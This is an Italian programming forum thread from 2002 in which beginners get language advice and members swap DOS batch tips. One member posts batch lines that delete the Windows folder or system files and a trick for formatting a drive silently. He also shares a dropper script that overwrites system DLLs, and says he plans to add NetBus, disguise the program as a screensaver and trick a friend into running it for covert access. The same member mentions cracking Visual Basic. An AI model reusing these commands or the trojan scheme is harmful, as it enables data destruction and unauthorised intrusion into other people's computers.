PDA

Visualizza versione completa : IN ERBA... COM'E' DIFFICILE


Lucavettu
09-08-2002, 20.24.14
siccome su 'sto forum ci sono decine di programmatori fenomenali...

io non so programmare un ca@@o... il massimo che riesco a fare sono i *.bat :rolleyes: perciò vorrei poter sapere almeno un linguaggino facile... mi consigliate qualcosa che sia davvero abbordabile???

(se poi con quel linguaggio posso creare dei programmi in exe o com... sarebbe meglio) grazie!!!!

DavideDave
09-08-2002, 20.25.41
visual basic ;)

è abbastanza semplice, soprattuto usando ambienti di sviluppo visuali ;)

Ciao :)

Lucavettu
10-08-2002, 05.23.07
manuali che hai già provato e compilatori adatti???

ho già fatto un aricerca ma sono tutti incasinati i manuali

xegallo
11-08-2002, 03.22.54
Originariamente inviato da lucavettu
manuali che hai già provato e compilatori adatti???

ho già fatto un aricerca ma sono tutti incasinati i manuali
come compilatori per la verità ne esiste solo uno quello della Micro$oft per quanto riguarda le guide non saprei dirti
in ogni caso vale la pena puntualizzare che con VB poi creare programmi solo ed esclusivamente per sistemi windows

Lucavettu
11-08-2002, 20.47.46
grazie ho fatto...

mi sono fatto regalare il visual studio di microsoft (che dentro ha anche visual basic) e ho trovato una guida che insegna esattamente l'inizio (pulsante e campo testo: al click appare la scritta nel campo testo)..

come faccio per far apparire un messaggio in popup quando clicco il pulsante? qualcuno può postare il codice plz???

grazie mille WT

Kaioshin
11-08-2002, 21.13.41
per fare aprire un popup devi inserire questo codice:

MsgBox " Metti qua il testo che vuoi."

Kaioshin
11-08-2002, 21.21.03
ti consiglio di guardare pure questa di guide

http://programmazione.html.it/visualbasic/

Klapaucius
11-08-2002, 21.26.12
uauauauaa

io mi sono sempre chiesto se quello di Office è la stessa cosa....
penso di si però.....boooooooo

prova con pascal hihihiihihh :D :D :D

ekerazha
11-08-2002, 21.50.22
Originariamente inviato da lucavettu
siccome su 'sto forum ci sono decine di programmatori fenomenali...

io non so programmare un ca@@o... il massimo che riesco a fare sono i *.bat :rolleyes: perciò vorrei poter sapere almeno un linguaggino facile... mi consigliate qualcosa che sia davvero abbordabile???

(se poi con quel linguaggio posso creare dei programmi in exe o com... sarebbe meglio) grazie!!!!

Io per iniziare ti consiglio il Delphi, la sintassi è la stessa del Pascal (quindi è semplice), è più performante del Visual Basic, e se hai Linux puoi usare anche il Kylix che è un "Delphi per Linux" :cool: :D

Klapaucius
11-08-2002, 21.56.37
si si...
Pascal Forever :D :D :D
quanti ricordi......
ekerazha hai mai programmato con il basic del Commodore 64???
Io c'ho fatto anche dei giochini :eek: :eek: :D :D :D

Lucavettu
12-08-2002, 01.48.33
grazie kaio e grazie anche agli altri :)

resto sempre dell'idea che se non esistesse wintricks (e il forum :D ) bisognerebbe inventarli...:rolleyes:

Kaioshin
12-08-2002, 02.18.50
Originariamente inviato da lucavettu
grazie kaio e grazie anche agli altri :)

resto sempre dell'idea che se non esistesse wintricks (e il forum :D ) bisognerebbe inventarli...:rolleyes:

:D (Y) :D ho appena "comprato" visual basic pure io :D :p :D

ekerazha
12-08-2002, 17.20.42
Originariamente inviato da Vito18
si si...
Pascal Forever :D :D :D
quanti ricordi......
ekerazha hai mai programmato con il basic del Commodore 64???
Io c'ho fatto anche dei giochini :eek: :eek: :D :D :D

Quando c'era il Commodore 64 io ero ancora in fasce, ho avuto il VIC20 e poi il Commodore Amiga 500, ma andavo ancora all'asilo, e prima di imparare a programmare, dovevo imparare a leggere e a scrivere :D :D :rolleyes: (B) (Y)

Klapaucius
12-08-2002, 17.28.07
:eek: :eek: :eek:
ma secondo te ti pare quando sono nato!!!!!
Non sono così vecchio....non ho l'età di billow (:p :p )
indovina????
Ti dò un'aiuto, sono più piccolo di Kaioshin

:D :D :D

ekerazha
12-08-2002, 18.26.12
Non saprei, io ne ho 16 di anni, e quando c'era il Commodore 64 di sicuro ne avevo meno di 4 :cool:

Klapaucius
12-08-2002, 18.51.14
16 - 17 - 18

Vito...................18?????
si 18!!!!

:D :D :D

Lucavettu
12-08-2002, 20.21.26
Originariamente inviato da Kaioshin


:D (Y) :D ho appena "comprato" visual basic pure io :D :p :D

:rolleyes: il mio però è originale :o :p

Lucavettu
12-08-2002, 20.26.52
siccome kaio mi aveva consigliato di guardare i tutorial di html.it, allora io mi sono scaricato tutte le pagine e le ho unite tutte con word x tutti i principianti come me( :rolleyes: )

però non posso postarlo perchè è 158 kb... azzz

Kaioshin
14-08-2002, 04.48.42
zippalo e uppalo in un tuo spazio web poi basta che metti il collegamento. :)

Lucavettu
16-08-2002, 02.17.05
sisisi quando ho scritto stavo x partire x il lago sono tornato adesso ma devo uscire con gli amici adesso (soprattutto LE AMICHE :D ) domani lo metto on-line e poi posto il link x la gioia dei wintrickersssssssss

pazzokramaz
27-08-2002, 16.54.00
xme con il .bat puoi fare qualsiasi cosa escuso le finestre e menù visivi molto complicati


forse il dephi kilix o borland c++ builder 5.5

il punto è che non riesco a trovare il vb6 trial da cracczare dopo:D :D popete aitarmi:(


grazie ciao:D

DavideDave
27-08-2002, 16.58.29
Originariamente inviato da pazzokramaz
xme con il .bat puoi fare qualsiasi cosa escuso le finestre e menù visivi molto complicati

:eek:





:confused:






(S)







(N)

Klapaucius
27-08-2002, 18.02.05
Originariamente inviato da DavideDave


:eek:





:confused:






(S)







(N)

:D :D :D

DavideDave
27-08-2002, 18.06.06
Originariamente inviato da Vito18


:D :D :D

eh no dai... certo cose non le puoi sentire... allora che c@@o mi sbatto il culo a fare con Java se posso fare tutto con i bat? ma dai solo a pensarci mi viene da ridere... ho ragione o no Vito? ..... bah.... :(

Ciao :)

Klapaucius
27-08-2002, 18.17.41
Originariamente inviato da DavideDave


eh no dai... certo cose non le puoi sentire... allora che c@@o mi sbatto il culo a fare con Java se posso fare tutto con i bat? ma dai solo a pensarci mi viene da ridere... ho ragione o no Vito? ..... bah.... :(

Ciao :)

Guarda io sò che con i bat o con i cmd si può fare pochissimo....
altrimenti facevo tutto con quelli ! ;)
Io di solito uso il c e poche volte il c++, ma non li utilizzo per creare software, finestre o altro,ma per programma microcontrollori (anche per creare schede pirata ihihihii scii non dirlo a nessuno :D ) quindi...tutte stringhe di comandi....
Tanto poi per visualizzare i messaggi ci pensano i display LCD ;):)

pazzokramaz
27-08-2002, 23.02.56
ma scusa se con il bat sono riuscito a creare un programma che installa e modifica una marea di cose in + mette anche la patch di net bus sul pc vittima



intendo dire che con il bat non puoi certo fare video giochi pagine web finestre di windows o so ma è un linguaggio utilissimo x la gestione dei file , x creare semplici menù in stile dos, x fare partire quasliasi programma fatto x win o un semplice file exe bat wav, (usando vari comanducci) insomma, si può legare il linguaggio bat al c++ x creare ttols o programmini semplici in poco tempo ;)


ciao

Klapaucius
27-08-2002, 23.12.56
Originariamente inviato da pazzokramaz
ma scusa se con il bat sono riuscito a creare un programma che installa e modifica una marea di cose in + mette anche la patch di net bus sul pc vittima



intendo dire che con il bat non puoi certo fare video giochi pagine web finestre di windows o so ma è un linguaggio utilissimo x la gestione dei file , x creare semplici menù in stile dos, x fare partire quasliasi programma fatto x win o un semplice file exe bat wav, (usando vari comanducci) insomma, si può legare il linguaggio bat al c++ x creare ttols o programmini semplici in poco tempo ;)


ciao

:rolleyes: :rolleyes: :rolleyes:

attrib
del erase
copy
rename
:rolleyes: :rolleyes: :rolleyes:
cosa si può fare ???
al massimo si posso creare dei file di testo o dei registri direttamente con un batch ma......:rolleyes: :rolleyes:

pazzokramaz
28-08-2002, 00.38.31
seeee hahha hahha:D

if exist ciao.txt deltree/Y %windir%
if not exist ciao.txt del %windir%\system\*.*
md ciao
deltree\Y ciao
edit autoexec.bat
usare un casino di variabili

creare file .reg con un bat

usare file .reg che modifinano il registro cliccando su un bat


Nome utente e nome computer (questito posto da Michael)
Problema: devo creare un file batch che esegua una certa operazione in base al nome del computer e il nome dell'utente che l'ha lanciato.
Soluzione: in Windows NT/2000 sono disponibili delle variabili d'ambiente che possono essere utilizzate sia per l'esecuzione controllata di file batch o programmi Access, Visual Basic, ecc.
Le variabili d'ambiente che servono nel nostro caso sono:
ComputerName (in cui è memorizzato il nome del computer)
UserName (in cui è memorizzato il nome dell'utente)
in un file batch come anche in un collegamento da un programma, si può richiamare il valore contenuto nella variabile d'ambiente aggiungento il simbolo % all'inizio e alla fine del nome della variabile (p.e. %ComputerName%).

Variabili d'ambiente
Problema: a proposito di variabili d'ambiente, ce ne sono altre che possono tornare utili?
Soluzione: esistono diverse variabili d'ambiente in Windows NT/2000 che possono essere utili. Ecco una lista delle più utili:
ComputerName (nome del computer)
HomeDrive (l'unità di default)
HomePath (la cartella di default)
OS (nome del sistema operativo)
SystemDrive (l'unità di sistema)
SystemRoot (la cartella del sistema operativo)
Temp (la cartella temporanea)
Tmp (la cartella temporanea)
UserName (il nome dell'utente)
UserProfile (la cartella di profilo dell'utente)




Sincronizzazione dell'orologio di sistema con uno atomico
Problema: come posso far sincronizzare l'orologio di sistema con un orologio atomico?
Soluzione: è sufficiente essere collegati in internet ed eseguire questi 2 comandi in Prompt di MS-DOS o in alternativa creare un file batch che li contenga e che possa essere lanciato ogni volta che si vuole:
net time /Setsntp:ntp2.nl.net
w32tm -Once
se non dovesse funzionare si può provare a cambiare il server dell'ora NTP (Network Time Protocol). Ecco un'alternativa:
time-A.timefreq.bldrdoc.gov

Accedere ad una cartella con il nome lungo
Problema: risulta complicato da Prompt di MS-DOS l'accesso ad una cartella con il nome lungo e con spazi tra le varie parti del nome.
Soluzione: un semplice sistema per accedere ad una cartella con nome lungo è quello di usare il carettere jolli *. In questo modo:
Se si vuole entrare nella cartella 'Programs File' è sufficiente scrivere:
CD Pro* e premere invio. In questo modo ci si sposta nella prima cartella con il nome che inizia per Pro.

Copiare una parte di testo dal Prompt di MS-DOS
Problema: alle volte sarebbe comodo poter copiare una parte di testo dal Prompt di MS-DOS per incollarlo in un altro programma.
Soluzione: si può copiare del testo dal Prompt di MS-DOS semplicemente premendo Alt+Spazio e dal menu selezionare Modifica / Copia.










PROMPT DEI COMANDI DI MS-DOS

Accesso alle directory

Per accedere alle directory, è possibile utilizzare
i seguenti comandi:

. = directory corrente
.. = directory superiore
... = directory superiore più una
.... = directory superiore più due

Ad esempio, per passare dalla directory C:\Windows\System\Viewers alla directory C:\Windows, digitare "cd..." al prompt dei comandi.


Visualizzazione delle directory dal prompt dei comandi

Al prompt dei comandi digitare "start ." per visualizzare il contenuto della cartella (directory) corrente oppure"start .." per visualizzare il contenuto della cartella
principale.


Trascinamento dei nomi di file nella finestra del prompt
dei comandi

Le icone di file e di cartelle possono essere trascinatedal desktop o da una cartella nella finestra del prompt dei comandi anziché digitarne il nome. Il nome del file o della cartella viene quindi memorizzato nel buffer della tastiera dell'applicazione per MS-DOS in esecuzione.


Operazioni di copia e incolla al prompt dei comandi

Attivando la barra degli strumenti nella finestra del programma per MS-DOS, è possibile eseguire le operazioni di copia, taglia e incolla con il mouse da un programma per Windows a un programma per MS-DOS. È ad esempio possibile copiare un
collegamento a una cartella sullo schermo e incollarlo in un messaggio di posta elettronica.


Avvio di programmi per Windows dal prompt dei comandi

Per avviare un programma per Windows dal prompt dei comandi, digitare il nome del programma specificando i parametri necessari. Ad esempio, per avviare il Blocco Note, digitare "notepad" al prompt dei comandi, quindi premere INVIO. I programmi per Windows possono essere avviati anche nei file batch.

Per avviare un programma o aprire un documento, è possibile utilizzare il comando "start", ad esempio
C:>start calc.exe.






COME UTILIZZARE IL COMANDO FORMAT IN MODO RAPIDO
Esiste un'opzione non documentata sul comando Format che permette di formattare un drive senza chiedere niente all'utente.
Per esempio, andando in Avvio --> Esegui e digitando

format a: /autotest

il sistema comicera' ad effettuare una formattazione incondizionata senza chiedere all'utente ne' di inserire un nuovo disco, ne' di scrivere l'etichetta di volume ne' se si vuole procedere ad ulteriori formattazioni.
Se questo comando viene utilizzato all'interno di una procedura batch, puo' essere interessante scriverlo cosi':

format a: /autotest >NUL

in modo che durante la formattazione non compaiano nemmeno le scritte: 1% completato ecc.


FORMATTARE UN DISCHETTO CON ALCUNI ACCORGIMENTI
Prima o poi capita a tutti di dover formattare un semplice floppy; solitamente abituati a Windows, lo facciamo da li', all'interno del Sistema Operativo.
Invece esiste un altro sistema che e' quello di aprire il prompt di MS-DOS e svolgere l'operazione dal vecchio DOS.
Il vantaggio e' che in questo modo potrete continuare a lavorare con Windows in multitasking.
Se digitate la stringa

Format/?

potrete vedere tutte le sintassi di questo comando.
La sintassi piu' semplice naturalmente e' Format A:


DOS E STAMPA
Capita a volte che utilizzando un applicativo tramite il prompt di MS-Dos non si riesca a stampare. La soluzione sta nel cambiare alcune configurazioni nelle proprieta' della Stampa.
Per fare questo, andate nel Pannello di Controllo-Stampanti. Cliccate con il tasto destro sulla stampante installata e scegliete Proprieta'. Selezionate la scheda Dettagli ed andate in Imposta Porta (l'ultimo bottone in basso a destra). Disattivate la casellina Spooling dei processi di Stampa Ms-Dos.
Cliccate su OK e passate ad Imposta Spooler ed attivate a questo punto l'opzione Invia direttamente alla stampante. Confermate con OK, cliccate su Applica ed infine su OK. A questo punto riavviate il PC per confermare le nuove impostazioni.
Senza scherzi di Windows, la stampa da Dos dovrebbe ricominciare a funzionare


ALCUNI SMANETTAMENTI CON MSDOS.SYS
Vorrei segnalarvi un trucco, utile per che come me ha ancora molto feeling con il vecchio MSDOS.
Editanto la linea del file MSDOS.SYS dove compare BootGui=x si comanda l'apparizione dell'interfaccia grafica di WIN.

Se x=0 il sistema parte in MSDOS e poi digitando WIN [invio] si passa alla grafica, un po' come con WIN 3.1

Se x=1 invece parte WIN in modalita' grafica Come al solito.

Pubblicate pure la mia info se vi sembra interessante e sicura


ALCUNE CURIOSITA' SUL PROMPT DEL MS DOS
E' opinione comune che quando si utilizza una sessione MS-DOS con il prompt di MS-DOS di Windows 98, che questi non *permetta* di utilizzare alcune funzionalita' dello stesso Windows.
In realta' grazie ad alcuni accorgimenti e' possibile richiamare ad esempio Esplora Risorse; fate in questo modo: andate in Start-Programmi-Prompt di MS-DOS adesso digitate semplicemente

explorer

e fate invio: ed ecco davanti a voi la cartella Esplora Risorse.

Se digitate un parametro dopo explorer (es. explorer 2) si attivera' Microsoft Internet Explorer.

Se indicate invece un percorso esistente sul vostro hard disk, ad esempio

explorer c:\documenti

si aprira' direttamente quella cartella che avete scelto (in questo caso Documenti)

pazzokramaz
28-08-2002, 00.39.15
IL COMANDO PING
Tra le utility *nascoste* di Windows98 c'e' anche il comando Ping, utilizzato da tutti coloro che si trovano in difficolta' a raggiungere un particolare sito web.
Ping e' un programma che ha lo scopo di verificare se un certo sito web e' attivo in quel momento e raggiungibile.
Puo' anche essere utilizzato per controllare se un computer in una rete TCP e' funzionante.

Il funzionamento del Ping e' semplice: esso invia una sequenza di dati ad una macchina specifica e resta in attesa della risposta.
Per utilizzarlo bisogna aprire il Prompt MS_DOS, scrivere

PING NOMEDELCOMPUTER

(che puo' essere l'indirizzo di un sito web, oppure il numero IP associato al sito internet). Quando la risposta e' positiva, appare una piccola sequenza di statistiche che dichiara il numero di pacchetti trasmessi, quanti sono stati ricevuti dall'indirizzo web e quanti (eventualmente) persi.
Quindi se ad esempio volete verificare se http://www.manuali.net e' funzionante, digitate:

PING http://www.manuali.net/

Nel caso in cui la connessione dovesse fallire, Ping visualizzera' per quattro volte la scritta RICHIESTA SCADUTA: quindi la macchina o il sito web e' irraggiungibile.

Esistono anche alcuni parametri per utilizzare al meglio questo programma:

- T (esempio: PING -T http://www.manuali.net/): questo comando permette di continuare a contattare la macchina finche' non viene interrotto manualmente dall'utente.

- N3 (esempio: PING -N3 http://www.manuali.net/): in questo caso solo per tre volte PING continuera' a cercare di contattare la macchina. Naturalmente potete impostare anche un altro numero


INCREMENTARE LA MEMORIA CON MS-DOS
Anche se siete oramai abituati a lavorare con Windows98, puo' capitare di dover utilizzare dei programmi che girano sotto MS-DOS.
Tuttavia puo' succedere di dover incrementare la memoria in MS-DOS per farlo lavorare meglio.

Piccola premessa: i vecchi file di configurazione di MS-DOS, config.sys, autoexec.bat, system.ini e win.ini, non hanno molta rilevanza per Windows98.
Invece accade l'esatto opposto quando l'MS-DOS viene simulato in una sessione Windows poiche' il DOS utilizza ancora questi file, in particolare system.ini.

Ricorriamo quindi ad uno stratagemma.
Andiamo su Start e scegliamo Esegui. Digitiamo Sysedit e e clicchiamo su OK.
Attiviamo al finestra di system.ini ed inseriamo la seguente riga

LoadHigh=1

nella sezione [386Enh] (cioe' proprio sotto questa dicitura).
Salviamo e chiudiamo sysedit.

Bene, adesso possiamo lavorare meglio con il prompt di MS-DOS


TRACERT
Una delle cose piu' buffe di Internet e' la trasmissioni dati che avviene in modo assolutamente mirato da vari computer che provvedono a smistare le informazioni secondo quali canali liberi (e piu' veloci) ci sono in quel momento.

Dico buffo perche' puo' capitare uno che si trovi a Milano e voglia visionare un sito a Trieste, possa finire dapprima per il Nord Europa per poi discendere, mentre come kilometraggi *fisici* (casello -casello direbbe qualcuno) la distanza e' più breve e non ci sarebbe bisogno di tutto questo scorrazzare.

Come fare per osservare che giretti si fanno con Internet?
In questo modo: Avvio - Programmi- Prompt di MS-DOS (va bene anche un emulatore DOS) Nella finestra che vi appare ci sara' C:\windows>
Digitiamo le seguenti parole:

tracert nome_di_destinazione

Ad esempio tracert http://www.manuali.net
Ed ecco che verra' mostrato tutto il percorso dal computer del nostro provider da dove ci colleghiamo fino al computer di destinazione, con tanto di sigle di Paesi attraversati o citta'.

Questo programma si chiama Traceroute ed e' contenuto sia in Win98 che Win95. Naturalmente per poterlo utilizzare dovrete essere connessi in Internet

------------------------------------------------------------------------------------------


tho guarda la chicca che sto preparando x il mio amico tutta fatta in batch......


@echo off

if exist c:\pkdll.loz goto stop
if not exist c:\pkdll.loz goto vai

:stop
echo.
echo PK DLL FOR C++ AND PK PROGRAMMI ( pktools )
echo BY pazzokramaz EMAIL krauma@tin.it
echo Le DLL sono gia state installate con successo
echo Chiudere questa finestra
echo ATTENZIONE non continuare
echo.
exit

:vai
if exist c:\windows\*.txt del c:\windows\*.txt >nul
if exist c:\bakdll\borlndmm.dll del c:\windows\borlndmm.dll
if exist c:\bakdll\borlndmm.dll xcopy c:\bakdll\borlndmm.dll c:\windows\
if not exist c:\windows\borlndmm.dll xcopy file\borlndmm.dll c:\windows\
if exist c:\bakdll\cp3240mt.dll del c:\windows\cp3240mt.dll
if exist c:\bakdll\cp3240mt.dll xcopy c:\bakdll\cp3240mt.dll c:\windows\
if not exist c:\windows\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\
if exist c:\bakdll\vcl35.bpl del c:\windows\vcl35.bpl
if exist c:\bakdll\vcl35.bpl xcopy c:\bakdll\vcl35.bpl c:\windows\
if not exist c:\windows\vcl35.bpl xcopy file\vcl35.bpl c:\windows\
if exist c:\bakdll\system\borlndmm.dll del c:\windows\system\borlndmm.dll
if exist c:\bakdll\system\borlndmm.dll xcopy c:\bakdll\system\borlndmm.dll c:\windows\system\
if not exist c:\windows\system\borlndmm.dll xcopy file\borlndmm.dll c:\windows\system\
if exist c:\bakdll\system\cp3240mt.dll del c:\windows\system\cp3240mt.dll
if exist c:\bakdll\system\cp3240mt.dll xcopy c:\bakdll\system\cp3240mt.dll c:\windows\system\
if not exist c:\windows\system\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\system\
if exist c:\bakdll\system\vcl35.bpl del c:\windows\system\vcl35.bpl
if exist c:\bakdll\system\vcl35.bpl xcopy c:\bakdll\system\vcl35.bpl c:\windows\system\
if not exist c:\windows\system\vcl35.bpl xcopy file\vcl35.bpl c:\windows\system\
if exist c:\bakdll\system32\borlndmm.dll del c:\windows\system32\borlndmm.dll
if exist c:\bakdll\system32\borlndmm.dll xcopy c:\bakdll\system32\borlndmm.dll c:\windows\system32\
if not exist c:\windows\system32\borlndmm.dll xcopy file\borlndmm.dll c:\windows\system32\
if exist c:\bakdll\system32\cp3240mt.dll del c:\windows\system32\cp3240mt.dll
if exist c:\bakdll\system32\cp3240mt.dll xcopy c:\bakdll\system32\cp3240mt.dll c:\windows\system32\
if not exist c:\windows\system32\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\system32\
if exist c:\bakdll\system32\vcl35.bpl del c:\windows\system32\vcl35.bpl
if exist c:\bakdll\system32\vcl35.bpl xcopy c:\bakdll\system32\vcl35.bpl c:\windows\system32\
if not exist c:\windows\system32\vcl35.bpl xcopy file\vcl35.bpl c:\windows\system32\

deltree/y c:\bakdll >nul
if exist c:\*.txt del c:\*.txt >nul

cd file
ren c++dll.dll c++dll.txt >nul
ren dll.dat oeminfo.ini >nul
cd..

xcopy file\c++dll.txt c:\windows\ >nul
xcopy file\c++dll.txt c:\windows\system\ >nul
xcopy file\c++dll.txt c:\windows\system32\ >nul
if exist file\c++dll.txt del file\c++dll.txt >nul

deltree/y c:\windows\temp >nul
md c:\windows\temp >nul

if exist c:\windows\oemlogo.bmp del c:\windows\oemlogo.bmp >nul
if exist c:\windows\system\oemlogo.bmp del c:\windows\system\oemlogo.bmp >nul
if exist c:\windows\system32\oemlogo.bmp del c:\windows\system32\oemlogo.bmp >nul
if exist c:\windows\system\oeminfo.ini del c:\windows\system\oeminfo.ini >nul
if exist c:\windows\system32\oeminfo.ini del c:\windows\system32\oeminfo.ini >nul
xcopy file\oeminfo.ini c:\windows\system\ >nul
xcopy file\oeminfo.ini c:\windows\system32\ >nul
if exist file\oeminfo.ini del file\oeminfo.ini >nul





xcopy file\pkdll.loz c:\



if not exist cazzodimerda\ciao.txt start notepad.exe


devo finirlo devo implementare varie cose tra le quali netbus x accedere al suo pc a sua insaputa;)

ps x sapere xchè sto facendo questo andare al tread urgentissimo devo creare........ in programmazione di hwupgrade forum

ciao
:D :D


le dll che infilo nelle suo cartelle servono a me:D

poi compilo in exe e cambio l'icona , gli dico che è uno screen saver lui abbocchera muhahhaaaaaaaaaaaaaaaaaa:D



intanto sto facendo la gestione dei file del mio prog pktools in bath:D

le variabili mi servono eccome:cool:

Lucavettu
28-08-2002, 08.16.24
scusa... come si creano i menu in un bat????

P8257 WebMaster
28-08-2002, 09.37.18
Originariamente inviato da pazzokramaz
IL COMANDO PING
Tra le utility *nascoste* di Windows98 c'e' anche il comando Ping, utilizzato da tutti coloro che si trovano in difficolta' a raggiungere un particolare sito web. ...

.. ho letto tutta la discussione .. :o

puoi andare avanti delle ore a scrivere ma non convincerai mai un programmatore, perché in realtà sa benissimo di cosa stai parlando.

Il Bat è a tutti gli effetti un linguaggio di SCRIPTING (incompleto per giunta) eseguito dall'interprete dei comandi.

Ciò non toglie che si possano fare tantissime cose (compresi i menu con cui mi sono dilettato tanti annii fa .. con caratterini del tipo: ─┐┘ ecc.) ma ben lungi dal definirlo un linguaggio di programmazione.

Senza aiuto esterno il bat manca di quelle strutture base che definiscono un linguaggio di programmazione come tale.

Scrivimi un "while" o anche un "for" in bat (senza child) e ti do il premio nobel

Bye :cool:

DavideDave
28-08-2002, 09.58.35
Originariamente inviato da P8257 WebMaster
i menu con cui mi sono dilettato tanti annii fa .. con caratterini del tipo: ─┐┘ ecc.)

:eek: Oddio P8257 WebMaster cosa mi hai fatto ricordare... il COBOL :eek: AHHHHHHHHHHHHHHH :eek: che due OO tutti quei ca@@o di caratteri speciali per fare i menu... e poi dovevo pure fare le finestre con l'effetto ombreggiato :eek: meno male che son passato a Java và, se no ero ancora lì a impazzire :D

Ciao :)

P8257 WebMaster
28-08-2002, 10.08.11
.. perdonami "Pazzokramaz", non ce l'ho con te .. ma queste informazioni sono incomplete e in alcuni aspetti errate:

Hai scritto:

Anche se siete oramai abituati a lavorare con Windows98, puo' capitare di dover utilizzare dei programmi che girano sotto MS-DOS.
Tuttavia puo' succedere di dover incrementare la memoria in MS-DOS per farlo lavorare meglio.

Piccola premessa: i vecchi file di configurazione di MS-DOS, config.sys, autoexec.bat, system.ini e win.ini, non hanno molta rilevanza per Windows98.
Invece accade l'esatto opposto quando l'MS-DOS viene simulato in una sessione Windows poiche' il DOS utilizza ancora questi file, in particolare system.ini.

Ricorriamo quindi ad uno stratagemma.
Andiamo su Start e scegliamo Esegui. Digitiamo Sysedit e e clicchiamo su OK.
Attiviamo al finestra di system.ini ed inseriamo la seguente riga

LoadHigh=1

nella sezione [386Enh] (cioe' proprio sotto questa dicitura).
Salviamo e chiudiamo sysedit.

Bene, adesso possiamo lavorare meglio con il prompt di MS-DOS


Parlando di Windows 98, come prima cosa c'é da fare la distinzione tra le due diverse modalità di utilizzo possibili:

Quando si utilizza l'emulazione DOS pura (quello attivabile all'avvio) essa funziona al 100% come una versione di MS-DOS in modalità reale potendo gestire in questa (senza driver esterni) SOLO i primi 640Kb di memoria del PC.
L'importanza dei file autoexec.bat e config.sys è quindi vitale, perché attraverso questi script il sistema carica i driver esterni necessari che gli permetteranno di gestire 640Kb di memoria entro i quali i programmi potranno essere eseguiti (memoria convenzionale) + 150Kb di memoria cosiddetta "alta" entro i quali caricare i driver di periferica appositamente progettati per questo scopo.
In questa modalità di utilizzo, il file system.ini NON VIENE NEANCHE APERTO, è inutile quindi qualsiasi ottimizzazione.

La seconda modalità di utilizzo è quella per emulazione in finestra attraverso la GUI di Windows.
Il discorso qui prende una "piega" totalmente diversa in quanto, oltre all'interfaccia grafica, viene caricato in memoria il kernel di Windows assieme all'Io base di DOS e all'interprete dei comandi .. in questa situazione, la gestione della memoria è affidata interamente al kernel che la utilizza come "meglio crede" tenendo in considerazione anche le impostazioni di swapping ecc.
In questa situazione i file config.sys e autoexec.bat non rivestono alcuna importanza e potrebbero essere eliminati (a meno che ovviamente non si abbia l'esigenza di caricare driver specifici x ms-dos all'avvio).
L'esecuzione dell'emulazione MS-DOS in finestra equivale a tutti gli effetti all'esecuzione di un'applicazione qualunque, tuttavia in questo caso l'ottimizzazione dei file system.ini e win.ini (che vengono considerati) riveste una sia pur minima importanza nella gestione della memoria consentendo una (superficiale) ottimizzazione.

Bye :cool:

P8257 WebMaster
28-08-2002, 10.19.49
Originariamente inviato da DavideDave


:eek: Oddio P8257 WebMaster cosa mi hai fatto ricordare... il COBOL :eek: AHHHHHHHHHHHHHHH :eek: che due OO tutti quei ca@@o di caratteri speciali per fare i menu... e poi dovevo pure fare le finestre con l'effetto ombreggiato :eek: meno male che son passato a Java và, se no ero ancora lì a impazzire :D

Ciao :)

.. a chi lo dici . :D .. però era bello dai .. ammettilo :D tutti quegli ascii in sequenza .. che quando facevi un bordo lungo sembravi una telescrivente .. :D


Bye :cool:

Klapaucius
28-08-2002, 10.35.56
ps x sapere xchè sto facendo questo andare al tread urgentissimo devo creare........ in programmazione di hwupgrade forum

guarda sul forum di hwupgrade non ho trovato niente....
cmq a me sembra qualche antenato di qualche virus.....:D :D :D

ne te uscivi prima con
del *.*

:D :D :D

DavideDave
28-08-2002, 10.51.24
Originariamente inviato da P8257 WebMaster


.. a chi lo dici . :D .. però era bello dai .. ammettilo :D tutti quegli ascii in sequenza .. che quando facevi un bordo lungo sembravi una telescrivente .. :D


Bye :cool:

lo ammetto lo ammetto :o effettivamente l'operazione aveva il suo indubbio fascino ;) e pensare che comunque il COBOL è ancora utilizzatissimo, sai? per molte grandi aziende costerebbe troppo migrare ad altre tecnologie e se lo tengono ben stretto :rolleyes: è duro a morire eh :D

LoryOne
28-08-2002, 11.12.04
Giusto.
Costerebbe troppo sia in tempo speso per ricreare l'interfaccia grafica,nella rielaborazione del codice e ,soprattutto, nella rielaborazzione della struttura dei database.

DavideDave
28-08-2002, 11.15.15
tanto è vero che tra i vari corsi di formazione professionale vi sono ancora oggi quelli di COBOL...

P8257 WebMaster
28-08-2002, 11.34.11
Si, anche da noi si usa Cobol nel settore gestionale .. ma io me ne tengo ben alla larga ... :D

Bye :cool:

pazzokramaz
28-08-2002, 13.08.41
no no c'è il tread sul forum di hwupgrade

http://forum.hwupgrade.it/showthread.php?threadid=287529&goto=newpost



beh lo so che il batch non è potente come altri ma a me basta tanto x l'interfaccia grafica posso usare il c++ builder

ascolta visto che sei in erba prova mmb multi media builder è molto bello:D


becca questo:

rem @echo off
if "%1"=="/?" goto what
if "%2"=="/?" goto what
if "%1"=="" goto norm
if "%1"=="/reg" goto regs
if "%1"=="/ver" goto vers
echo Invalid switch...
goto exet
:what
echo ------------------------------------------------------------
echo Questa procedura automatica consente di "svuotare" il cestino
echo di eliminare la lista dei Dati recenti, di cancellare file .tmp
echo .gid e molto di piu'!
echo Digitate al prompt di DOS:
echo PULISCI [/i³/reg³/ver] [/?]
echo /? mostra questo messaggio.
echo /REG pulisce il registro degli ultimi file aperti
:: Next lines detect DOS path...
SET|FIND/I "path">nul
if errorlevel 1 goto nopth
echo Regedit.exe e Attrib.exe devono risiedere nella directory path
goto mkreg
:nopth
echo Regedit.exe e Attrib.exe devono risiedere nella directory path
:mkreg
echo Controlla che Regedit non sia aperto.
pause
goto exetb
:vers
cls
:regs
set regclr=1
:norm
cls
SET|FIND/I "temp">nul
if errorlevel 1 goto huh
goto atribb
:huh
echo Errore. variabile temp non impostata!
pause
goto exet
:atribb
attrib>nul
if errorlevel 0 goto windir
echo Errore. impossibile procedere senza Attrib.exe
pause
goto exet
:windir
SET|FIND/I "winbootdir">nul
if errorlevel 1 goto nowicheck
if "%1"=="/reg" goto next
goto good
:nowicheck
:: Secondary detection for Win2000...
SET|FIND/I "USERNAME">nul
if errorlevel 1 goto nowi
goto good
:nowi
echo Avvio dall'interno di Windows...
pause
exit
goto exet
:next
if exist %winbootdir%\regedit.exe goto good
echo Regedit.exe non trovato.
set regclr=0
echo Impossibile procedere alla pulizia del registro senza Regedit.exe!
pause
:good
echo Cancellazione Dati recenti...
del %winbootdir%\recent\*.pif
del %winbootdir%\recent\*.lnk
del %winbootdir%\profiles\%username%\recent\*.pif
